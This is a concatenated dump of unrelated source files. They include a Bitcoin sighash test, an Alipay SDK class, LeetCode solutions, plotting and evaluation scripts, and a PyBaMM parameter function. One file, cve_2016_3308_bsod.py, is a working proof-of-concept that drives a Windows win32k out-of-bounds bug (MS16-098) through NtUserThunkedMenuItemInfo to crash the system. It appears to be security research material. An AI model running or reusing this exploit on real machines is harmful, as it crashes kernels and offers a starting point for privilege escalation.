coinbase_tx.txs_out.append(network.tx.TxOut(
1000000000, network.script.compile('%s OP_CHECKSIG' % b2h(k.sec()))))
self.assertEqual('2acbe1006f7168bad538b477f7844e53de3a31ffddfcfc4c6625276dd714155a',
b2h_rev(coinbase_tx.hash()))
# Make the test transaction
txs_in = [
network.tx.TxIn(coinbase_tx.hash(), 0),
network.tx.TxIn(coinbase_tx.hash(), 1),
network.tx.TxIn(coinbase_tx.hash(), 2),
]
txs_out = [
network.tx.TxOut(900000000, network.contract.for_address(k3.address())),
network.tx.TxOut(800000000, network.contract.for_address(k4.address())),
network.tx.TxOut(800000000, network.contract.for_address(k5.address())),
]
tx = network.tx(1, txs_in, txs_out)
tx.set_unspents(coinbase_tx.txs_out)
self.assertEqual('791b98ef0a3ac87584fe273bc65abd89821569fd7c83538ac0625a8ca85ba587', b2h_rev(tx.hash()))
sig_type = flags.SIGHASH_SINGLE
solution_checker = network.tx.SolutionChecker(tx)
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[0].script, 0, sig_type)
self.assertEqual(0xcc52d785a3b4133504d1af9e60cd71ca422609cb41df3a08bbb466b2a98a885e, sig_hash)
sig = sigmake(k0, sig_hash, sig_type)
self.assertTrue(sigcheck(k0, sig_hash, sig[:-1]))
tx.txs_in[0].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(0))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[1].script, 1, sig_type)
self.assertEqual(0x93bb883d70fccfba9b8aa2028567aca8357937c65af7f6f5ccc6993fd7735fb7, sig_hash)
sig = sigmake(k1, sig_hash, sig_type)
self.assertTrue(sigcheck(k1, sig_hash, sig[:-1]))
tx.txs_in[1].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(1))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[2].script, 2, sig_type)
self.assertEqual(0x53ef7f67c3541bffcf4e0d06c003c6014e2aa1fb38ff33240b3e1c1f3f8e2a35, sig_hash)
sig = sigmake(k2, sig_hash, sig_type)
self.assertTrue(sigcheck(k2, sig_hash, sig[:-1]))
tx.txs_in[2].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(2))
sig_type = flags.SIGHASH_SINGLE | flags.SIGHASH_ANYONECANPAY
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[0].script, 0, sig_type)
self.assertEqual(0x2003393d246a7f136692ce7ab819c6eadc54ffea38eb4377ac75d7d461144e75, sig_hash)
sig = sigmake(k0, sig_hash, sig_type)
self.assertTrue(sigcheck(k0, sig_hash, sig[:-1]))
tx.txs_in[0].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(0))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[1].script, 1, sig_type)
self.assertEqual(0xe3f469ac88e9f35e8eff0bd8ad4ad3bf899c80eb7645947d60860de4a08a35df, sig_hash)
sig = sigmake(k1, sig_hash, sig_type)
self.assertTrue(sigcheck(k1, sig_hash, sig[:-1]))
tx.txs_in[1].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(1))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[2].script, 2, sig_type)
self.assertEqual(0xbacd7c3ab79cad71807312677c1788ad9565bf3c00ab9a153d206494fb8b7e6a, sig_hash)
sig = sigmake(k2, sig_hash, sig_type)
self.assertTrue(sigcheck(k2, sig_hash, sig[:-1]))
tx.txs_in[2].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(2))
if __name__ == "__main__":
unittest.main()
|
alipay/aop/api/domain/InsOffilneProduct.py | snowxmas/alipay-sdk-python-all | 213 | 12690996 | <reponame>snowxmas/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class InsOffilneProduct(object):
def __init__(self):
self._biz_data = None
self._prod_code = None
self._prod_name = None
@property
def biz_data(self):
return self._biz_data
@biz_data.setter
def biz_data(self, value):
self._biz_data = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def prod_name(self):
return self._prod_name
@prod_name.setter
def prod_name(self, value):
self._prod_name = value
def to_alipay_dict(self):
params = dict()
if self.biz_data:
if hasattr(self.biz_data, 'to_alipay_dict'):
params['biz_data'] = self.biz_data.to_alipay_dict()
else:
params['biz_data'] = self.biz_data
if self.prod_code:
if hasattr(self.prod_code, 'to_alipay_dict'):
params['prod_code'] = self.prod_code.to_alipay_dict()
else:
params['prod_code'] = self.prod_code
if self.prod_name:
if hasattr(self.prod_name, 'to_alipay_dict'):
params['prod_name'] = self.prod_name.to_alipay_dict()
else:
params['prod_name'] = self.prod_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = InsOffilneProduct()
if 'biz_data' in d:
o.biz_data = d['biz_data']
if 'prod_code' in d:
o.prod_code = d['prod_code']
if 'prod_name' in d:
o.prod_name = d['prod_name']
return o
|
Codes/gracekoo/85_maximal-rectangle.py | liuxiaohui1221/algorithm | 256 | 12691020 | <filename>Codes/gracekoo/85_maximal-rectangle.py
# -*- coding: utf-8 -*-
# @Time: 2020/3/30 22:22
# @Author: GraceKoo
# @File: 85_maximal-rectangle.py
# @Desc:https://leetcode-cn.com/problems/maximal-rectangle/
from typing import List
class Solution:
def maximalRectangle(self, matrix: List[List[str]]) -> int:
max_area = 0
dp = [0] * len(matrix[0])
for row in range(0, len(matrix)):
for col in range(0, len(matrix[0])):
dp[col] = dp[col] + 1 if matrix[row][col] == "1" else 0
max_area = max(max_area, self.largestRectangleArea(dp))
return max_area
# from 84_largest-rectangle-in-histogram
def largestRectangleArea(self, heights: List[int]) -> int:
stack = []
res = 0
heights = [0] + heights + [0]
for i in range(len(heights)):
while stack and heights[i] < heights[stack[-1]]:
tmp = stack.pop()
res = max(res, (i - stack[-1] - 1) * heights[tmp])
stack.append(i)
return res
so = Solution()
print(
so.maximalRectangle(
[
["1", "0", "1", "0", "0"],
["1", "0", "1", "1", "1"],
["1", "1", "1", "1", "1"],
["1", "0", "0", "1", "0"],
]
)
)
|
RecoParticleFlow/PFProducer/python/pfConcretePFCandidateProducer_cfi.py | ckamtsikis/cmssw | 852 | 12691075 | import FWCore.ParameterSet.Config as cms
pfConcretePFCandidateProducer = cms.EDProducer("PFConcretePFCandidateProducer",
src = cms.InputTag('particleFlow')
)
|
Python3/795.py | rakhi2001/ecom7 | 854 | 12691079 | <reponame>rakhi2001/ecom7
__________________________________________________________________________________________________
sample 372 ms submission
# look at every usb array individually and compare elements to L and R -> O(n^3)
# use stack
# iterate through A
# keep track of max of the current stack
# if max <
# if you find an element that is between L and R, then all subarrays consisting of that element and elements to the left and rihgt of it
# which are less than R will be valid subarrays
class Solution:
def numSubarrayBoundedMax(self, A: List[int], L: int, R: int) -> int:
res, dp = 0, 0
prev = -1
for i,a in enumerate(A):
if a < L:
res += dp
elif a > R:
dp = 0
prev = i
else:
dp = i - prev
res += dp
return res
__________________________________________________________________________________________________
sample 14136 kb submission
class Solution:
def numSubarrayBoundedMax(self, A: List[int], L: int, R: int) -> int:
prev = -1
res = 0
last = 0
for i, n in enumerate(A):
if L<=n<=R:
last = i-prev
res += last
elif n<=L:
res += last
else:
prev = i
last = 0
return res
__________________________________________________________________________________________________
|
HRI/TFVT_HRI/scripts/plot_valence_arousal_plain.py | WorldEditors/PaddleRobotics | 146 | 12691096 | import os
import codecs
import numpy as np
import matplotlib.pyplot as plt
Has_Header = True
CSV = 'data/valence_arousal_exp.csv'
def calculate_mean_variance(data):
theta = np.arctan(data[:, 0] / data[:, 1])
m_x = np.mean(np.cos(theta))
m_y = np.mean(np.sin(theta))
mu = np.arctan(m_y / m_x)
R = np.sqrt(m_x ** 2 + m_y ** 2)
sigma = np.sqrt(-2 * np.log(R))
return mu, sigma
def filled_arc(center, radius, theta1, theta2, color):
# Ref: https://stackoverflow.com/a/30642704
phi = np.linspace(theta1, theta2, 100)
x = center[0] + radius * np.cos(phi)
y = center[1] + radius * np.sin(phi)
# Equation of the chord
m = (y[-1] - y[0]) / (x[-1] - x[0])
c = y[0] - m * x[0]
y2 = m * x + c
# Plot the filled arc
plt.fill_between(x, y, y2, facecolor=color, edgecolor='none', alpha=0.5)
def filled_sector(center, radius, theta1, theta2, color):
filled_arc(center, radius, theta1, theta2, color)
# Fill triangle
x_0, y_0 = center
x_1 = center[0] + radius * np.cos(theta1)
y_1 = center[1] + radius * np.sin(theta1)
x_2 = center[0] + radius * np.cos(theta2)
y_2 = center[1] + radius * np.sin(theta2)
plt.fill([x_0, x_1, x_2, x_0], [y_0, y_1, y_2, y_0], facecolor=color,
edgecolor='none', alpha=0.5)
def plot(name_lst, group_lst, mu_lst, sigma_lst):
cx, cy = 5.0, 5.0
colors = ['red', 'blue']
markers = ['x', '+']
linestyles = ['r-', 'b--']
bg_img = plt.imread('data/28-affect-words.png')
# plt.imshow(bg_img, extent=[-0.5, 10.5, -0.5, 10.5])
plt.imshow(bg_img, extent=[-0.2, 10.2, 0.1, 9.9])
theta = np.linspace(0, 2 * np.pi, 100)
radius = 4.8
x = radius * np.cos(theta) + cx
y = radius * np.sin(theta) + cy
plt.plot(x, y, color='black')
for name, group, mu, sigma, color, marker, linestyle in \
zip(name_lst, group_lst, mu_lst, sigma_lst, colors, markers, linestyles):
plt.plot(group[:, 0], group[:, 1], marker, label=name, color=color)
ex = cx + radius * np.cos(mu)
ey = cy + radius * np.sin(mu)
plt.plot([cx, ex], [cy, ey], linestyle)
for d_mu in [-sigma, sigma]:
ex = cx + radius * np.cos(mu + d_mu)
ey = cy + radius * np.sin(mu + d_mu)
plt.plot([cx, ex], [cy, ey], linestyle='-', color='black')
filled_sector([cx, cy], radius, mu - sigma, mu + sigma, color)
plt.axis('equal')
plt.xlabel('Valence')
plt.ylabel('Arousal')
plt.xlim(0, 10)
plt.ylim(0, 10)
plt.legend(loc='lower left', bbox_to_anchor=(0.65, 0.0))
plt.savefig('valence_arousal_plain.pdf', bbox_inches='tight')
plt.show()
group_1, group_2 = [], []
with codecs.open(CSV, 'r', 'utf-8') as f:
for line in f.readlines():
if Has_Header:
Has_Header = False
continue
eps = np.random.random(2) * 0.1
data = line.strip().split(',')
if int(data[0]) == 1:
group_1.append((int(data[2]) + eps[0], int(data[3]) + eps[1]))
elif int(data[0]) == 2:
group_2.append((int(data[2]) + eps[0], int(data[3]) + eps[1]))
group_1 = np.array(group_1)
group_2 = np.array(group_2)
mu_1, sigma_1 = calculate_mean_variance(group_1)
mu_2, sigma_2 = calculate_mean_variance(group_2)
plot(['Reactive HRI', 'TFVT-HRI'], [group_2, group_1], [mu_2, mu_1], [sigma_2, sigma_1])
|
ddpg/results/plot_reward.py | q110110543/deep-rl | 113 | 12691097 | import numpy
import matplotlib.pyplot as plt
FILE_NAME = 'rewards_nonshare.npz'
def smooth(reward_vec, filter_size):
l = len(reward_vec) - filter_size + 1
print(len(reward_vec))
smooth_reward_vec = numpy.zeros(l)
for i in range(l):
reward = numpy.mean(reward_vec[i:i+filter_size])
smooth_reward_vec[i] = reward
return smooth_reward_vec
if __name__ == '__main__':
f = numpy.load(FILE_NAME)
reward = f['arr_0']
qmax = f['arr_1']
reward_smooth = smooth(reward, 300)
l = len(reward_smooth)
fig = plt.figure(figsize=(8,6))
line1, = plt.plot(reward_smooth, color='r', linestyle='-', linewidth=3)
line2, = plt.plot(numpy.arange(l), -150 * numpy.ones(l), color='k', linestyle=':', linewidth=1)
plt.xlabel('Episode', fontsize=26)
plt.ylabel('Reward', fontsize=24)
plt.xticks(fontsize=22)
plt.yticks([-800, -700, -600, -500, -400, -300, -200, -150, -100, 0], fontsize=22)
plt.axis([-20, l+10, -600, -100])
plt.tight_layout()
fig.savefig('reward.pdf', format='pdf', dpi=1200)
plt.show()
|
Basic/Calculate Factorial of A Number/SolutionByVaishnavi.py | rajethanm4/Programmers-Community | 261 | 12691121 | #To find factorial of number
num = int(input('N='))
factorial = 1
if num<0:
print('Number is not accepted')
elif num==0:
print(1)
else:
for i in range(1,num+1):
factorial = factorial * i
print(factorial)
|
neat/eval.py | sisl/neat | 183 | 12691171 | import argparse
import json
import os
import sys
from tqdm import tqdm
from PIL import Image, ImageDraw
import numpy as np
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
import torch.nn.functional as F
torch.backends.cudnn.benchmark = True
from config import GlobalConfig
from architectures import AttentionField
from data import CARLA_points
from utils import iou, flow_to_color
parser = argparse.ArgumentParser()
parser.add_argument('--id', type=str, help='Unique experiment identifier.')
parser.add_argument('--device', type=str, default='cuda', help='Device to use')
parser.add_argument('--vis', action='store_true', help='Visualize each model while evaluating')
parser.add_argument('--vis_freq', type=int, default=100, help='Visualization frequency')
parser.add_argument('--batch_size', type=int, default=16, help='Batch size')
parser.add_argument('--out_res', type=int, default=256, help='output image resolution')
args = parser.parse_args()
# config
conf = GlobalConfig()
# data
val_set = CARLA_points(conf.val_data, conf)
dataloader_val = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=8, pin_memory=True)
# model
model = AttentionField(conf, args.device)
# load saved weights
model.encoder.load_state_dict(torch.load('log/{}/best_encoder.pth'.format(args.id)))
model.decoder.load_state_dict(torch.load('log/{}/best_decoder.pth'.format(args.id)))
# image storage directories
if args.vis:
if not os.path.isdir(f"log/{args.id}/img"):
os.makedirs(f"log/{args.id}/img")
if not os.path.isdir(f"log/{args.id}/sem"):
os.makedirs(f"log/{args.id}/sem")
if not os.path.isdir(f"log/{args.id}/out"):
os.makedirs(f"log/{args.id}/out")
if not os.path.isdir(f"log/{args.id}/flow"):
os.makedirs(f"log/{args.id}/flow")
intersection_epoch = [0.] * conf.num_class
union_epoch = [0.] * conf.num_class
off_epoch = 0.
wp_epoch = 0.
match = 0
miss = 0
fp = 0
converter = np.uint8(conf.converter) # used for semantics
with torch.no_grad():
model.eval()
for batch_num, data in enumerate(tqdm(dataloader_val), 0):
# create batch and move to GPU
fronts_in = data['fronts']
lefts_in = data['lefts']
rights_in = data['rights']
images = []
for i in range(conf.seq_len):
images.append(fronts_in[i].to(args.device, dtype=torch.float32))
if conf.num_camera==3:
images.append(lefts_in[i].to(args.device, dtype=torch.float32))
images.append(rights_in[i].to(args.device, dtype=torch.float32))
# semantic points for network input
query_points = data['semantic_points'].to(args.device, dtype=torch.float32)
gt_occ = data['semantic_labels'].to(args.device)
# target points for network input
target_point = torch.stack(data['target_point']).to(args.device, dtype=torch.float32)
# waypoints for visualization
waypoints = []
# create driving offset label by looping over timesteps
# label = -query + waypoint so that at test time query + label = waypoint
gt_offsets = -query_points.clone()
for i in range(conf.tot_len):
waypoint = torch.stack(data['waypoints'][i]).to(args.device, dtype=torch.float32)
waypoints.append(waypoint)
# create a delta tensor to add to the query points
delta = waypoint.transpose(0,1).unsqueeze(1) # (B, 1, 2)
# divide to account for higher resolution
delta = (-gt_offsets[:,:,2]==i).unsqueeze(-1) * delta / conf.resolution # (B, P, 2)
gt_offsets[:,:,:2] += delta
gt_offsets = gt_offsets[:,:,:2].transpose(1,2) # (B, 2, P)
gt_offsets[:,1,:] += conf.offset # reconstruct only front of vehicle
velocity = data['velocity'].to(args.device, dtype=torch.float32)
# inference
encoding = model.encoder(images, velocity)
pred_occ, pred_off, _ = model.decode(query_points, target_point, encoding)
# waypoint prediction
pred_waypoint_mean, red_light_occ = model.plan(target_point, encoding, conf.plan_scale, conf.plan_points, conf.plan_iters)
wp_pred = pred_waypoint_mean[:,conf.seq_len:]
wp_gt = torch.stack(waypoints[conf.seq_len:], dim=1).transpose(0,2)
# s,t,b = model.control_pid(wp_pred, velocity, target_point, red_light_occ)
# grid used for visualizing occupancy and flow
linspace_x = torch.linspace(-conf.axis/2, conf.axis/2, steps=args.out_res)
linspace_y = torch.linspace(-conf.axis/2, conf.axis/2, steps=args.out_res)
linspace_t = torch.linspace(0, conf.tot_len - 1, steps=conf.tot_len)
# gt semantics
semantics = (data['topdowns'][0][0][0].data.cpu().numpy()).astype(np.uint8)
semantics = converter[semantics][:conf.axis,conf.offset:conf.axis+conf.offset]
red_light_gt = (semantics==3).sum()
if red_light_gt and red_light_occ:
match += 1
if red_light_gt and red_light_occ==0:
miss += 1
if red_light_gt==0 and red_light_occ:
fp += 1
if args.vis and (batch_num % args.vis_freq == 0):
for i in range(conf.seq_len):
# save one sample per batch
if not os.path.isdir(f"log/{args.id}/img/{str(i)}"):
os.makedirs(f"log/{args.id}/img/{str(i)}")
front_numpy = (fronts_in[i][0].data.cpu().numpy().transpose((1, 2, 0))).astype(np.uint8)
left_numpy = (lefts_in[i][0].data.cpu().numpy().transpose((1, 2, 0))).astype(np.uint8)
right_numpy = (rights_in[i][0].data.cpu().numpy().transpose((1, 2, 0))).astype(np.uint8)
image_numpy = np.concatenate([left_numpy,front_numpy,right_numpy], axis=1)
image_display = Image.fromarray(image_numpy)
image_display.save(f"log/{args.id}/img/{str(i)}/{str(batch_num).zfill(4)}.png")
# target point in pixel coordinates
target_point_pixel = target_point.squeeze().cpu().numpy()
target_point_pixel[1] += conf.offset * conf.resolution
# hack for when actual target is outside image (axis/2 * resolution)
target_point_pixel = np.clip(target_point_pixel, -(conf.axis/2 * conf.resolution - 1), (conf.axis/2 * conf.resolution - 1))
target_point_pixel = (target_point_pixel*args.out_res//50 + args.out_res//2).astype(np.uint8)
for i in range(conf.tot_len):
if not os.path.isdir(f"log/{args.id}/sem/{str(i)}"):
os.makedirs(f"log/{args.id}/sem/{str(i)}")
if not os.path.isdir(f"log/{args.id}/out/{str(i)}"):
os.makedirs(f"log/{args.id}/out/{str(i)}")
if not os.path.isdir(f"log/{args.id}/flow/{str(i)}"):
os.makedirs(f"log/{args.id}/flow/{str(i)}")
# gt semantics
semantics = (data['topdowns'][i][0][0].data.cpu().numpy()).astype(np.uint8)
semantics = converter[semantics][:conf.axis,conf.offset:conf.axis+conf.offset]
semantic_display = np.zeros((semantics.shape[0], semantics.shape[1], 3))
for key, value in conf.classes.items():
semantic_display[np.where(semantics == key)] = value
semantic_display = semantic_display.astype(np.uint8)
semantic_display = Image.fromarray(semantic_display)
semantic_display.save(f"log/{args.id}/sem/{str(i)}/{str(batch_num).zfill(4)}.png")
# gt waypoint in pixel coordinates
img_waypoint = waypoints[i].data.cpu().numpy()
img_waypoint[1] += conf.offset * conf.resolution
img_waypoint = np.clip(img_waypoint, -(conf.axis/2 * conf.resolution - 1), (conf.axis/2 * conf.resolution - 1))
img_waypoint = (img_waypoint*args.out_res//(conf.axis * conf.resolution) + args.out_res//2).astype(np.uint8)
# predicted waypoint in pixel coordinates
pred_waypoint = pred_waypoint_mean[0,i].data.cpu().numpy()
pred_waypoint[1] += conf.offset * conf.resolution
pred_waypoint = np.clip(pred_waypoint, -(conf.axis/2 * conf.resolution - 1), (conf.axis/2 * conf.resolution - 1))
pred_waypoint = (pred_waypoint*args.out_res//(conf.axis * conf.resolution) + args.out_res//2).astype(np.uint8)
# visualization of occupancy and flow
img_rows = []
flow_rows = []
for row in range(args.out_res):
grid_x, grid_y, grid_t = torch.meshgrid(linspace_x, linspace_y[row], linspace_t[i].unsqueeze(0))
grid_points = torch.stack((grid_x, grid_y, grid_t), dim=3).unsqueeze(0).repeat(args.batch_size,1,1,1,1)
grid_points = grid_points.reshape(args.batch_size,-1,3).to(args.device, dtype=torch.float32)
pred_img_pts, pred_img_offsets, _ = model.decode(grid_points, target_point, encoding)
pred_img_pts = torch.argmax(pred_img_pts[-1], dim=1)
pred_img = pred_img_pts.reshape(args.batch_size,args.out_res)
pred_flow = pred_img_offsets[-1].reshape(args.batch_size,2,args.out_res)
img_rows.append(pred_img)
flow_rows.append(pred_flow)
pred_img = torch.stack(img_rows, dim=-1)
pred_flow = torch.stack(flow_rows, dim=-1)
semantics = pred_img[0,:,:].transpose(1, 0).data.cpu().numpy().astype(np.uint8)
semantic_display = np.zeros((semantics.shape[0], semantics.shape[1], 3))
for key, value in conf.classes.items():
semantic_display[np.where(semantics == key)] = value
semantic_display = semantic_display.astype(np.uint8)
semantic_display = Image.fromarray(semantic_display)
semantic_display.save(f"log/{args.id}/out/{str(i)}/{str(batch_num).zfill(4)}.png")
# flow image of predicted offsets
flow_uv = pred_flow[0,:,:,:].transpose(2,0).data.cpu().numpy()*args.out_res/conf.axis
flow_rgb = flow_to_color(flow_uv)
flow_display = Image.fromarray(flow_rgb)
draw = ImageDraw.Draw(flow_display)
draw.ellipse([tuple(target_point_pixel-2), tuple(target_point_pixel+2)], fill='Blue', outline='Blue')
draw.ellipse([tuple(img_waypoint-2), tuple(img_waypoint+2)], fill='Green', outline='Green')
draw.ellipse([tuple(pred_waypoint-2), tuple(pred_waypoint+2)], fill='Red', outline='Red')
flow_display.save(f"log/{args.id}/flow/{str(i)}/{str(batch_num).zfill(4)}.png")
pred_occ_class = torch.argmax(pred_occ[-1], dim=1)
# losses
for k in range(conf.num_class):
gt_occ_k = gt_occ==k
pred_occ_k = pred_occ_class==k
for pt1, pt2 in zip(gt_occ_k, pred_occ_k):
intersection, union = iou(pt1, pt2)
intersection_epoch[k] += float(intersection.item())
union_epoch[k] += float(union.item())
off_epoch += float(F.l1_loss(pred_off[-1], gt_offsets).mean())
wp_epoch += float(F.l1_loss(wp_gt,wp_pred).mean())
out_loss = np.array(intersection_epoch) / np.array(union_epoch)
off_loss = off_epoch / float(batch_num)
wp_loss = wp_epoch / float(batch_num)
print (f'Off: {off_loss:3.3f}')
print (f'Wp: {wp_loss:3.3f}')
print (f'Match: {match}')
print (f'Miss: {miss}')
print (f'FP: {fp}')
for k in range(conf.num_class):
print(f'Class {k:02d}: IoU: {out_loss[k]:3.3f}') |
examples/cve_2016_3308_bsod.py | plowsof/mayhem | 214 | 12691214 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ms16_098_bsod.py
#
# Copyright 2016 <NAME> <<EMAIL>>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""
References:
- http://www.zerodayinitiative.com/advisories/ZDI-16-453/
- http://j00ru.vexillium.org/?p=2105
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms647578(v=vs.85).aspx
Useful breakpoints:
- win32k!NtUserThunkedMenuItemInfo
- win32k!xxxInsertMenuItem
- win32k!xxxInsertMenuItem+0x10c
- win32k!xxxInsertMenuItem+0x188
- win32k!xxxInsertMenuItem+0x195
- win32k!xxxInsertMenuItem+0x1aa ".printf \"rbx = 0x%p, [rsp+0x90] = 0x%p\\n\", rbx, poi(rsp+0x90)"
- win32k!xxxInsertMenuItem+0x2ec
"""
MF_POPUP = 0x0010
MF_STRING = 0x0000
MFS_ENABLED = 0x0000
MFT_STRING = 0x0000
MIIM_BITMAP = 0x0080
MIIM_ID = 0x0002
MIIM_STRING = 0x0040
MIIM_SUBMENU = 0x0004
HBMMENU_SYSTEM = 1
import ctypes
import os
import platform
import random
import sys
import time
lib_path = os.path.split(__file__)[0]
lib_path = os.path.join(lib_path, '..')
lib_path = os.path.abspath(lib_path)
sys.path.insert(0, lib_path)
from mayhem.datatypes.windows import MENUITEMINFOW
from mayhem.datatypes.windows import UNICODE_STRING
from mayhem.exploit.windows import WindowsSyscall
from mayhem.exploit.windows import error_on_null
from mayhem.exploit.windows import print_handle
user32 = ctypes.windll.user32
syscall = WindowsSyscall()
def add_submenu_item(h_menu, name, w_id=None):
h_submenu = user32.CreatePopupMenu()
mi_info = MENUITEMINFOW()
mi_info.cbSize = ctypes.sizeof(MENUITEMINFOW)
mi_info.fMask = MIIM_STRING | MIIM_SUBMENU | MIIM_ID | MIIM_BITMAP
mi_info.fState = MFS_ENABLED
mi_info.hSubMenu = h_submenu
mi_info.wID = random.randint(0x10, 0xff) if w_id is None else w_id
mi_info.dwTypeData = name
mi_info.hbmpItem = HBMMENU_SYSTEM # (required to set nPosition to 1 in trigger)
item = UNICODE_STRING.from_string(name)
result = error_on_null(syscall.NtUserThunkedMenuItemInfo(
h_menu, # HMENU hMenu
0, # UINT nPosition
False, # BOOL fByPosition
True, # BOOL fInsert
ctypes.byref(mi_info), # LPMENUITEMINFOW lpmii
ctypes.byref(item) # PUNICODE_STRING pstrItem
))
print("NtUserThunkedMenuItemInfo submenu result: 0x{0:08x}".format(result))
return h_submenu
def add_menu_item(h_menu, name, w_id=None):
mi_info = MENUITEMINFOW()
mi_info.cbSize = ctypes.sizeof(MENUITEMINFOW)
mi_info.fMask = MIIM_STRING | MIIM_ID
mi_info.fType = MFT_STRING
mi_info.fState = MFS_ENABLED
mi_info.wID = random.randint(0x1000, 0xffff) if w_id is None else w_id
item = UNICODE_STRING.from_string(name)
result = error_on_null(syscall.NtUserThunkedMenuItemInfo(
h_menu, # HMENU hMenu
-1, # UINT nPosition
True, # BOOL fByPosition
True, # BOOL fInsert
ctypes.byref(mi_info), # LPMENUITEMINFOW lpmii
ctypes.byref(item) # PUNICODE_STRING pstrItem
))
print(" mi_info->wID = 0x{0:04x}".format(mi_info.wID))
return result
def trigger(h_menu, name, w_id, n_position, f_by_position):
mi_info = MENUITEMINFOW()
mi_info.cbSize = ctypes.sizeof(MENUITEMINFOW)
mi_info.fMask = MIIM_STRING | MIIM_ID
mi_info.fType = MFT_STRING
mi_info.fState = MFS_ENABLED
mi_info.wID = w_id
item = UNICODE_STRING.from_string(name)
result = error_on_null(syscall.NtUserThunkedMenuItemInfo(
h_menu, # HMENU hMenu
n_position, # UINT nPosition
f_by_position, # BOOL fByPosition
True, # BOOL fInsert
ctypes.byref(mi_info), # LPMENUITEMINFOW lpmii
ctypes.byref(item) # PUNICODE_STRING pstrItem
))
return result
def fill_menu(h_menu, base_idx=0x1000, count=7):
for idx in range(0, count):
print("[*] adding menu item #{0}".format(idx + 1))
time.sleep(0.25)
add_menu_item(h_menu, "menu item {0}".format(idx), w_id=(base_idx + idx))
return
def main():
print('**************************************************')
print('* CVE-2016-3308 / MS16-098 / ZDI-16-453 BSOD *')
print('* win32k!xxxInsertMenuItem Out-of-Bounds Access *')
print('* Spencer (@zeroSteiner) McIntyre *')
print('**************************************************')
if platform.architecture()[0] == '64bit':
print("[*] x86-64 syscall: 0x{0:016x}".format(syscall.address))
else:
print("[*] x86 syscall: 0x{0:08x}".format(syscall.address))
#raw_input("[*] PID: {0}, press enter to continue...".format(os.getpid()))
h_menu = user32.CreateMenu()
print("[*] h_menu: 0x{0:08x}".format(h_menu))
print_handle(h_menu)
h_submenu = add_submenu_item(h_menu, 'submenu', w_id=0x0123)
print("[*] h_submenu: 0x{0:08x}".format(h_submenu))
print_handle(h_submenu)
add_menu_item(h_submenu, 'subsubmenu-item', w_id=0x0001)
fill_menu(h_menu, base_idx=0x1001)
print("[+] triggering...")
time.sleep(0.5)
trigger(h_menu, 'sploit', w_id=0, n_position=0x0123, f_by_position=False)
return 0
main()
|
pybamm/input/parameters/lithium_ion/electrolytes/lipf6_Ramadass2004/electrolyte_diffusivity_Ramadass2004.py | manjunathnilugal/PyBaMM | 330 | 12691236 | <reponame>manjunathnilugal/PyBaMM
from pybamm import exp, constants
def electrolyte_diffusivity_Ramadass2004(c_e, T):
"""
Diffusivity of LiPF6 in EC:DMC as a function of ion concentration.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. "Development of First Principles Capacity Fade Model for Li-Ion Cells."
(2004)
Parameters
----------
c_e: :class:`pybamm.Symbol`
Dimensional electrolyte concentration
T: :class:`pybamm.Symbol`
Dimensional temperature
Returns
-------
:class:`pybamm.Symbol`
Solid diffusivity
"""
D_c_e = 7.5e-10
E_D_e = 37040
arrhenius = exp(E_D_e / constants.R * (1 / 298.15 - 1 / T))
return D_c_e * arrhenius
|
build/build.py | babel/6to5-sublime | 3,565 | 12691263 | import sublime
import sublime_plugin
__all__ = ['BuildBabelPackageCommand']
BABEL_CONFIGURATION = {
'name': 'JavaScript (Babel)',
'scope': 'source.js',
'file_extensions': [ 'js', 'jsx', 'es6', 'babel' ],
'flow_types': True,
'jsx': True,
'string_object_keys': True,
'custom_templates': {
'styled_components': True,
},
}
class BuildBabelPackageCommand(sublime_plugin.ApplicationCommand):
def run(self):
from sublime_lib import ResourcePath
from pathlib import Path
from shutil import rmtree
package_path = Path(__file__).parent.parent
syntax_path = ResourcePath.from_file_path(package_path) / 'JavaScript (Babel).sublime-syntax'
